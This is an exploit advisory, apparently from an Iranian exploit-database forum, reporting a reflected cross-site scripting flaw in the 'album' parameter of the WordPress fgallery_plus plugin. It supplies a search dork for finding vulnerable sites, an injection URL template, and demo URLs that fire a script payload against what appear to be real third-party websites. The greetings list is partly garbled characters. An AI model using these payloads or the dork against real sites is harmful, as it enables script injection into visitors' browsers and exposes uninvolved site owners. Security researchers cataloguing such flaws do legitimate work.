The Wordpress fgallery_plusy Plugin suffers from a Cross-Site Scripting vulnerability.

#################################

Iranian Exploit DataBase Forum

http://iedb.ir/acc

http://iedb.ir

#################################

Exploit Title : Wordpress fgallery_plus Plugin Xss vulnerabilities

Author : Iranian Exploit DataBase

Discovered By : IeDb

Email : [email protected]

Id : o0_iedb_0o

Home : http://iedb.ir - http://iedb.ir/acc

Software Link : http://wordpress.org/

Security Risk : High

Tested on : Linux

Dork : inurl:/plugins/fgallery_plus/

#################################

Exploit :

http://site.com/wp-content/plugins/fgallery_plus/fim_rss.php?album=[Xss]

Dem0 :

http://allanmc.dk/wp-content/plugins/fgallery_plus/fim_rss.php?album=3"><script>alert(/IeDb.Ir/)</script>

http://www.quiolikeoooh.com/quio/wp-content/plugins/fgallery/fim_rss.php?album=3"><script>alert(/IeDb.Ir/)</script>

#################################

Tnx To : TaK.FaNaR - l4tr0d3ctism - r3d_s0urc3 - Bl4ck M4n - F??A±??п?ЅiD - Medrik - Dj.TiniVini - dr.koderz - z3r0 - Mr Zer0

B3hz4d - C0dex - Behnam Vanda - ErfanMs - E2MA3N - S!Y0U.T4r.6T - ??п?Ѕ??A?4??п?Ѕ??п?Ѕ ??A¦3??A???A? - 0x0ptim0us - ARTA

& All Member In Iedb.ir/acc & Iranian Hackers

#################################

Exploit Archive = http://www.iedb.ir/exploits-584.html

#################################